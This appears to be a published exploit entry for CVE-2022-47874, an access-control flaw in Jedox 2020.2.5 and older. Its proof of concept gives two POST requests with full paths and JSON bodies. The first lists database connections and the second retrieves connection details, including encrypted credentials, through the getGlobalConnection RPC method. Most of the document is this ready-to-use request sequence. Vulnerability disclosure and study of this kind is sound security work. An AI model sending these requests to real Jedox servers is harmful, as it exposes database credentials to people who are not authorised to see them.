# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls# Date: 28/04/2023# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL# Vendor Homepage: https://jedox.com# Version: Jedox 2020.2 (20.2.5) and older# CVE : CVE-2022-47874
Introduction
=================
Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.
Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/)for a detailed write-up on how to exploit vulnerability.
Proof of Concept
=================1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):
PATH:/be/rpc.php
METHOD: POST
BODY:[["conn","ls",[
null,
false,
true,["type","active","description"]]]]2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:
PATH:/tc/rpc
METHOD: POST
BODY:[["com.jedox.etl.mngr.Connections","getGlobalConnection",["<CONNECTION>"]]]
